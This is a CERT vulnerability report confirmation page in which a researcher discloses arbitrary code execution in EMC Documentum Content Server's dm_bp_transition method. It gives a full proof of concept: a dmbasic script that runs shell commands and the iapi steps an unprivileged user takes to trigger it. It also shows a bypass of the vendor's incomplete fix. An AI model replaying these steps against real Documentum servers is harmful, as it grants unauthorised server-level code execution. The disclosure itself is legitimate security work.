Vulnerability Report Confirmation - [VRF#HUFPRMOP] Your vulnerability report has been successfully received. You may save or print this page for your own records. The Report Tracking ID assigned to this report is VRF#HUFPRMOP. Details of your report are listed below. If you have any questions or require additional information, please call the CERT Hotline at +1 412-268-7090 or send email to cert@cert.org . Please reference this Report Tracking ID: VRF#HUFPRMOP. Do not use the back button to submit another report. Click here instead. ------------------------------------------------------------------------ Vulnerability Report Name Andrey B. Panfilov Organization independent Email Address andrew@panfilov.tel Telephone Number Vulnerability Description EMC Documentum Content Server: arbitrary code execution in dm_bp_transition.ebs Vendor was notified about vulnerability on November 2013, though vendor claims, that vulnerability has been fixed, it wasn't announced and the fix is incomplete. Provided PoC: Docbase method information: API> retrieve,c,dm_method where object_name='dm_bp_transition' ... 1001ffd780000176 API> dump,c,l ... USER ATTRIBUTES object_name : dm_bp_transition owner_name : dmadmin owner_permit : 7 group_name : docu group_permit : 5 world_permit : 3 method_verb : ./dmbasic -f./dm_bp_transition.ebs -eBP_Transition method_args []: launch_direct : T launch_async : F trace_launch : F run_as_server : T Vulnerable Code (userPostprocID$ - user input parameter): Sub BP_Transition(_ docbase_name$,_ server_config_name$,_ user_name$,_ user_ticket$,_ sysID$,_ policyID$,_ aliasID$,_ userEntryID$,_ actionID$,_ userActionID$,_ userPostprocID$,_ targetState$,_ targetStateNo$,_ resumeStateNo$,_ run_entry$,_ run_actions$,_ commitFlag$,_ attachFlag$,_ login_as$,_ orig_sessionID$) ..... If (result = True And commitFlag = "T") Then If (debug = True) Then PrintToLog sess, "Commit the changes." End If result = CommitIt(sess, sysID, policyID, aliasID, targetStateNo, resumeStateNo, attachFlag) If (result = True) Then If (debug = True) Then PrintToLog sess, "Run post action." End If result = RunProcedure(userPostprocID, 4, sess, sysID,_ user_name, targetState) End If Else Exploitation: $ cat /tmp/test cat: /tmp/test: No such file or directory $ cat > test.ebs Public Function EntryCriteria(ByVal SessionId As String,_ ByVal ObjectId As String,_ ByVal UserName As String,_ ByVal TargetState As String,_ ByRef ErrorString As String) As Boolean t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test") EntryCriteria=True End Function $ iapi Please enter a docbase name (docubase): repo Please enter a user (dmadmin): unprivileged_user Please enter password for unprivileged_user: EMC Documentum iapi - Interactive API interface (c) Copyright EMC Corp., 1992 - 2011 All rights reserved. Client Library Release 6.7.1000.0027 Connecting to Server using docbase repo [DM_SESSION_I_SESSION_START]info: "Session 0101d920800b1a37 started for user unprivileged_user." Connected to Documentum Server running Release 6.7.1090.0170 Linux.Oracle Session id is s0 API> create,c,dm_procedure ... 0801d920804e5416 API> set,c,l,object_name SET> test ... OK API> setfile,c,l,test.ebs,crtext ... OK API> save,c,l ... OK API> ?,c,execute do_method with method='dm_bp_transition', arguments='repo repo dmadmin "" 0000000000000000 0000000000000000 0000000000000000 0801d920804e5416 0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000' (1 row affected) API> Bye $ cat /tmp/test dm_bp_transition_has_vulnerability Vendor have decided that the root cause of problem is users are able to create dm_procedure objects, and now in Documentum Content Server v6.7SP1P26 we have following behavior: [DM_SESSION_I_SESSION_START]info: "Session 0101d920800f0174 started for user unprivileged_user." Connected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle Session id is s0 API> create,c,dm_procedure ... 0801d920805929d0 API> set,c,l,object_name SET> test ... OK API> setfile,c,l,test.ebs,crtext ... OK API> save,c,l ... [DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user (unprivileged_user) needs to have superuser or sysadmin privilege." BUT: API> create,c,dm_document ... 0901d920805929dd API> set,c,l,object_name SET> test ... OK API> setfile,c,l,test.ebs,crtext ... OK API> save,c,l ... OK API> ?,c,execute do_method with method='dm_bp_transition',arguments='repo repo dmadmin "" 0000000000000000 0000000000000000 0000000000000000 0901d920805929dd 0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000' (1 row affected) .... API> Bye ~]$ cat /tmp/test dm_bp_transition_has_vulnerability ~]$ Can we provide your name to the vendor? Yes Do you want to be publicly acknowledged? Yes Vendor Contact Status will not contact Vendor Name EMC Vendor Contact Name Vendor Contact Email Vendor Contact Telephone Number Vendor Tracking ID Additional Vendor Information Affected System Configurations All versions of Documentum Content Server How was this vulnerability found? Is the vulnerability being exploited? Yes Is there a public exploit? Yes Vulnerability Impact Comments Attached File Date 2014-04-25T12:48:51 Report Tracking ID VRF#HUFPRMOP CERT Tracking IDs VU#315340 ------------------------------------------------------------------------ Carnegie Mellon University ©2014 Carnegie Mellon University